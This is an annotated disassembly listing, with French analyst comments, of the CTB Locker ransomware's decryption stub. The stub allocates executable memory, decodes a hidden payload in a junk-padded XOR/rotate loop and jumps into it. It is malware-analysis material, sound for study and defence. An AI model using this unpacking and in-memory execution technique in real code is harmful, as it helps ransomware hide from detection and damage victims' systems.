.text:004028D6 DecodageProc: ; CODE XREF: .text:00401483 .text:004028D6 ; DATA XREF: .text:00402E11 .text:004028D6 : Routine de décodage du vrai code du malware CTB Locker .text:004028D6 xor edx, edx .text:004028D8 sub edx, offset unk_4055B7 ; EDX = début zone à décoder .text:004028DE neg edx .text:004028E0 sub edi, edi .text:004028E2 xor edi, 674h .text:004028E8 mov ecx, 37497531h ; .text:004028E8 ; ========== VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ========== .text:004028ED push ecx ; On sauve ECX et EDX via la pile .text:004028EE push edx .text:004028EF mov ebx, 5F88252Bh .text:004028F4 sub ebx, 5F8824EBh .text:004028FA push ebx ; EBX = 0x40, soit flProtect = PAGE_EXECUTE_READWRITE .text:004028FB mov ebx, 5F8834EBh .text:00402900 sub ebx, 5F8824EBh .text:00402906 push ebx ; EBX = 0x1000, soit flAllocationType = MEM_COMMIT .text:00402907 mov ebx, 5F882B5Fh .text:0040290C sub ebx, 5F8824EBh .text:00402912 push ebx ; EBX = 0x674, soit dwSize = 0x674 .text:00402913 mov edx, 0 .text:00402918 push edx ; lpAdress = NULL, on laisse le systeme prendre la mémoire où il veut .text:00402919 call ds:VirtualAlloc .text:0040291F pop edx ; On récupère EDX et ECX sauvés plus haut .text:00402920 pop ecx ; ECX = 0x37497531 .text:00402921 test eax, eax .text:00402923 jz endProc ; Si l'allocation n'a pas marché, on s'en va... .text:00402929 lea ebx, [eax] ; Sinon, EBX pointe sur les pages allouées .text:0040292B push ebx ; On empile EBX pour pouvoir ensuite à la fin du décodage exécuter le code décodé .text:0040292C .text:0040292C loc_40292C: ; CODE XREF: .text:00402DAE .text:0040292C mov byte ptr dword_4070DD, 7Dh .text:00402933 sbb dword ptr byte_407127, esi .text:00402939 mov esi, dword ptr unk_40703E .text:0040293F mov byte ptr dword_40716B, 1Bh .text:00402946 mov esi, dword_407142+2 .text:0040294C sbb esi, esi ; ESI = ESI+CF-ESI .text:0040294E sbb dword_40705A+1, esi .text:00402954 sbb dword ptr unk_4070A0, esi .text:0040295A mov esi, dword_40716B+2 .text:00402960 mov byte ptr dword_40712A, 89h .text:00402967 sbb esi, esi .text:00402969 add dword_4070FD+2, esi .text:0040296F sub dword_407076+1, esi .text:00402975 mov byte_40709C, 0B6h .text:0040297C mov esi, dword ptr unk_4070A6 .text:00402982 adc esi, 0FFFFFFAAh .text:00402985 mov esi, dword_407174+1 .text:0040298B xor eax, eax ; EAX = 0 .text:0040298D xor eax, [edx] ; On charge EAX avec 4 octets pointés par EDX .text:0040298F mov byte ptr dword_4070FD, 40h .text:00402996 adc dword ptr byte_4070E8, esi .text:0040299C mov byte ptr dword_40706A+1, 0DAh .text:004029A3 or dword_4070C7, esi .text:004029A9 add dword ptr unk_40712E, esi .text:004029AF add esi, esi .text:004029B1 add esi, esi .text:004029B3 mov byte ptr dword_407158, 11h .text:004029BA sbb dword ptr unk_4071A6, esi .text:004029C0 and esi, 0FFFFFFA3h .text:004029C3 sbb dword_407055, esi .text:004029C9 add esi, esi .text:004029CB sbb esi, esi .text:004029CD and dword_40710A+1, esi .text:004029D3 sub esi, 5Ch .text:004029D6 adc dword_407166+3, esi .text:004029DC adc dword ptr byte_407017, esi .text:004029E2 mov esi, dword_40716B+2 .text:004029E8 lea edx, [edx+4] ; On avance EDX pour les 4 octets suivants à la prochaine boucle .text:004029EB or esi, 21h .text:004029EE mov byte ptr dword_40718D+1, 0B3h .text:004029F5 mov byte ptr dword_407130+2, 0A6h .text:004029FC mov byte_4071A8, 0B0h .text:00402A03 add dword_40706A+3, esi .text:00402A09 and esi, 3Ch .text:00402A0C mov dword_407076, esi .text:00402A12 mov esi, dword_407086+2 .text:00402A18 mov byte_407101, 69h .text:00402A1F or esi, 0FFFFFF86h .text:00402A22 or esi, 0FFFFFFDAh .text:00402A25 mov esi, dword_407000 .text:00402A2B sbb esi, esi .text:00402A2D add esi, esi .text:00402A2F adc dword_407051, esi .text:00402A35 not eax ; Traitement 1 : NOT EAX .text:00402A37 mov esi, dword_40701E .text:00402A3D mov dword_407035+1, esi .text:00402A43 mov esi, dword_407170 .text:00402A49 mov esi, dword_407091 .text:00402A4F mov byte ptr unk_4071C1, 98h .text:00402A56 sbb esi, 0FFFFFFF8h .text:00402A59 sbb esi, 0FFFFFFE3h .text:00402A5C mov esi, dword_40716B+2 .text:00402A62 add esi, esi .text:00402A64 mov byte ptr dword_407170+1, 9Dh .text:00402A6B and esi, 0FFFFFFCEh .text:00402A6E sub esi, esi .text:00402A70 or esi, 73h .text:00402A73 add esi, esi .text:00402A75 mov esi, dword ptr byte_4071CB .text:00402A7B clc .text:00402A7C adc eax, 0FFFFFFE7h ; Traitement 2 : ADC EAX,0FFFFFFE7h .text:00402A7F mov esi, dword_40705A+2 .text:00402A85 adc dword ptr byte_407181, esi .text:00402A8B mov esi, dword_407142 .text:00402A91 mov byte ptr dword_407166, 5Ch .text:00402A98 mov byte_4070F3, 1Eh .text:00402A9F add esi, esi .text:00402AA1 sub esi, 7Ch .text:00402AA4 mov esi, dword_4070D7+2 .text:00402AAA sub esi, esi .text:00402AAC mov byte ptr dword_4070B7+3, 0C5h .text:00402AB3 or esi, 1Ch .text:00402AB6 adc esi, esi .text:00402AB8 mov byte ptr unk_4071E7, 0ABh .text:00402ABF mov esi, dword ptr byte_40709D .text:00402AC5 sbb dword_407005+3, esi .text:00402ACB mov esi, dword ptr unk_407068 .text:00402AD1 mov esi, dword_4071D5+1 .text:00402AD7 xor dword ptr unk_4071DF, esi .text:00402ADD mov esi, dword_407105+2 .text:00402AE3 xor eax, ecx ; Traitement 3 : XOR EAX,ECX .text:00402AE5 xor esi, 0FFFFFFDBh .text:00402AE8 mov esi, dword_407051+3 .text:00402AEE add esi, 8 .text:00402AF1 add esi, 7 .text:00402AF4 mov esi, dword_40704C+2 .text:00402AFA add esi, esi .text:00402AFC mov byte ptr dword_4070A1, 87h .text:00402B03 mov esi, dword_40710A+3 .text:00402B09 adc esi, esi .text:00402B0B sbb esi, esi .text:00402B0D mov esi, dword_407055 .text:00402B13 xor esi, 70h .text:00402B16 mov byte ptr dword_40706A, 48h .text:00402B1D mov byte ptr dword_4070AC+3, 9Ch .text:00402B24 mov dword_407188+1, esi .text:00402B2A mov esi, dword_40713E+2 .text:00402B30 and esi, 31h .text:00402B33 xor esi, 3Dh .text:00402B36 sbb dword ptr unk_407156, esi .text:00402B3C or dword ptr byte_407101, esi .text:00402B42 inc eax ; Traitement 4 : INC EAX .text:00402B43 mov byte_4070E6, 9 .text:00402B4A xor esi, esi .text:00402B4C add esi, esi .text:00402B4E or esi, 1Ch .text:00402B51 and esi, 0FFFFFFC2h .text:00402B54 adc esi, esi .text:00402B56 mov byte ptr dword_40702D+1, 76h .text:00402B5D mov esi, dword ptr byte_4070CF .text:00402B63 mov byte ptr dword_4071FB, 79h .text:00402B6A mov byte ptr unk_4070B0, 60h .text:00402B71 or dword ptr unk_4071F0, esi .text:00402B77 mov byte_407182, 19h .text:00402B7E sbb dword ptr unk_4071F8, esi .text:00402B84 add esi, 47h .text:00402B87 sbb esi, esi .text:00402B89 mov byte ptr dword_407134+3, 0E8h .text:00402B90 mov byte ptr dword_40719E, 85h .text:00402B97 push eax ; On colle EAX dans ECX pour changer la clé de codage pour les 4 prochains octets .text:00402B98 pop ecx .text:00402B99 sub esi, 0FFFFFFCCh .text:00402B9C mov byte ptr dword_407080+1, 9 .text:00402BA3 mov esi, dword_40704C+3 .text:00402BA9 mov esi, dword ptr byte_4070F2 .text:00402BAF mov dword_4070AC+2, esi .text:00402BB5 adc dword ptr byte_4070F1, esi .text:00402BBB add esi, esi .text:00402BBD mov esi, dword_407138+1 .text:00402BC3 mov esi, dword_4071B3+3 .text:00402BC9 mov byte_4070C2, 45h .text:00402BD0 sbb dword_407063+3, esi .text:00402BD6 add esi, esi .text:00402BD8 mov esi, dword_4071C7+3 .text:00402BDE xor esi, esi .text:00402BE0 and dword ptr unk_407067, esi .text:00402BE6 add dword ptr byte_40709F, esi .text:00402BEC or dword_40719A+2, esi .text:00402BF2 rol ecx, 1 ; On décale ECX d'un bit à gauche... .text:00402BF4 xor esi, esi .text:00402BF6 or esi, 0FFFFFF85h .text:00402BF9 xor esi, 0FFFFFFF2h .text:00402BFC add esi, esi .text:00402BFE or dword ptr byte_4071A8, esi .text:00402C04 mov esi, dword ptr unk_4071E4 .text:00402C0A and dword ptr unk_4071ED, esi .text:00402C10 and esi, 48h .text:00402C13 add esi, esi .text:00402C15 mov esi, dword_4070A7+1 .text:00402C1B adc esi, 0FFFFFFB1h .text:00402C1E mov byte ptr dword_40717A, 25h .text:00402C25 mov byte ptr dword_4071FB, 3Ah .text:00402C2C sub dword ptr byte_40703F, esi .text:00402C32 mov byte_407059, 85h .text:00402C39 or esi, 0FFFFFFDAh .text:00402C3C sbb esi, 0FFFFFFC8h .text:00402C3F or dword_407170+1, esi .text:00402C45 mov byte ptr dword_4071D5+1, 29h .text:00402C4C rol ecx, 7 ; ...puis de 7 bits supplémentaires. .text:00402C4F sbb esi, 3Fh .text:00402C52 adc esi, esi .text:00402C54 add esi, esi .text:00402C56 adc esi, esi .text:00402C58 xor esi, esi .text:00402C5A mov esi, dword_407055+1 .text:00402C60 mov byte ptr unk_407015, 93h .text:00402C67 mov byte ptr dword_407184+3, 62h .text:00402C6E mov byte_407199, 0E2h .text:00402C75 mov esi, dword ptr unk_40713C .text:00402C7B sbb esi, esi .text:00402C7D xor esi, 0FFFFFF90h .text:00402C80 mov byte ptr dword_40716B+3, 4Ch .text:00402C87 mov esi, dword_407134+1 .text:00402C8D mov byte_40702A, 0F7h .text:00402C94 mov esi, dword_407174+3 .text:00402C9A sub esi, 0FFFFFFF0h .text:00402C9D mov esi, dword ptr unk_40711B .text:00402CA3 mov [ebx], eax ; On écrit les 4 octets décodés dans le buffer alloué plus haut .text:00402CA5 or esi, 0FFFFFFBEh .text:00402CA8 sub esi, esi .text:00402CAA xor esi, 61h .text:00402CAD add esi, 71h .text:00402CB0 mov esi, dword_407035+1 .text:00402CB6 add dword_40705A+1, esi .text:00402CBC or dword_40702D+3, esi .text:00402CC2 mov byte ptr unk_4070FB, 0C5h .text:00402CC9 mov esi, dword_407113 .text:00402CCF mov byte ptr dword_4071A2+1, 68h .text:00402CD6 mov esi, dword_407149+1 .text:00402CDC add esi, esi .text:00402CDE add esi, 0FFFFFF84h .text:00402CE1 adc esi, esi .text:00402CE3 add esi, 5Dh .text:00402CE6 mov esi, dword_4071C7 .text:00402CEC mov esi, dword_40707B .text:00402CF2 add dword_4071DA+3, esi .text:00402CF8 sub ebx, 0FFFFFFFCh .text:00402CFB xor dword_407158, esi .text:00402D01 mov byte_4071D2, 0CAh .text:00402D08 sbb esi, esi .text:00402D0A or dword ptr byte_407042, esi .text:00402D10 adc esi, 0FFFFFFABh .text:00402D13 mov byte_40707A, 0F2h .text:00402D1A mov esi, dword_407117+1 .text:00402D20 mov esi, dword ptr byte_4071F6 .text:00402D26 add dword_40708D, esi .text:00402D2C mov esi, dword_4071B3 .text:00402D32 mov byte_4071CD, 0CFh .text:00402D39 mov byte_407085, 95h .text:00402D40 add esi, esi .text:00402D42 add esi, 65h .text:00402D45 add esi, esi .text:00402D47 mov esi, dword_4071BD+2 .text:00402D4D add edi, 0FFFFFFFCh .text:00402D50 mov byte_4071CB, 6Eh .text:00402D57 mov byte ptr dword_4071DA, 2Ch .text:00402D5E sbb esi, 5Eh .text:00402D61 xor esi, esi .text:00402D63 mov byte ptr dword_40712A+2, 6Ah .text:00402D6A mov esi, dword_40706E+3 .text:00402D70 xor esi, esi .text:00402D72 sbb esi, 0FFFFFFA1h .text:00402D75 mov esi, dword_407194+3 .text:00402D7B mov esi, dword_4070E2+3 .text:00402D81 mov esi, dword_40707B+3 .text:00402D87 mov esi, dword ptr unk_407153 .text:00402D8D sbb esi, esi .text:00402D8F mov byte ptr dword_407035, 0E7h .text:00402D96 mov esi, dword_4071AF+3 .text:00402D9C add esi, esi .text:00402D9E mov byte ptr dword_407142+3, 5 .text:00402DA5 mov esi, dword_407000+2 .text:00402DAB cmp edi, 0 .text:00402DAE <jnz loc_40292C ; ===> On retourne au début de la routine de décodage .text:00402DAE ; .text:00402DB4 mov ebx, esp ; On met ESP dans EBX. ESP pointe à ce moment là sur l'adresse du bloc alloué avant le décodage. .text:00402DB4 ; Plus bas on ira exécuter le code décodé en sautant sur ce bloc. .text:00402DB6 mov ecx, ds:GetModuleHandleA .text:00402DBC push ecx .text:00402DBD add eax, edi ; Quand on est arrivé là, EDI=0... .text:00402DBF xor edx, ecx .text:00402DC1 adc esi, esi .text:00402DC3 mov dl, byte ptr dword_4070F6+2 .text:00402DC9 xor edx, 0FFFFFFA7h .text:00402DCC and dword_40712A+3, esi .text:00402DD2 sbb byte_407069, dl .text:00402DD8 or ch, 0B6h .text:00402DDB mov byte_4070F4, 8Dh .text:00402DE2 sbb edi, edx .text:00402DE4 and esi, 4Fh .text:00402DE7 add edi, esi .text:00402DE9 mov esi, dword_4070BB+2 .text:00402DEF mov byte ptr dword_407188+2, 4Fh .text:00402DF6 mov ah, byte ptr dword_407162+2 .text:00402DFC mov esi, dword_407055+3 .text:00402E02 mov byte_407180, 69h .text:00402E09 sbb dword ptr byte_4071D9, ecx .text:00402E0F sub esi, esi .text:00402E11 push offset DecodageProc ; loc_4028D6 = routine de décodage avec allocation de buffer .text:00402E11 ; ...on dirait qu'on prépare un retour pour un deuxième passage décodage+exécution après le premier (à voir plus tard) ??? .text:00402E16 add edx, edx .text:00402E18 mov eax, dword_40717A+1 .text:00402E1D mov byte ptr dword_4071DA, 0FBh .text:00402E24 sbb dword_40701E, edx .text:00402E2A add esi, edi .text:00402E2C sbb eax, 2Ch .text:00402E2F xor edi, 0FFFFFFF5h .text:00402E32 xor dword ptr unk_40718C, esi .text:00402E38 sbb dword_40710A, edi .text:00402E3E sub byte ptr unk_407121, ch .text:00402E44 mov edi, dword_4070A7+1 .text:00402E4A mov edx, dword_40710A+1 .text:00402E50 mov edi, dword ptr unk_407112 .text:00402E56 mov byte_4070B6, 0FDh .text:00402E5D add edx, 0FFFFFFBDh .text:00402E60 mov byte ptr dword_4071BD+1, 27h .text:00402E67 mov edx, dword_4071AF .text:00402E6D jmp dword ptr [ebx] ; ==> On exécute le code décodé dans le buffer alloué au début...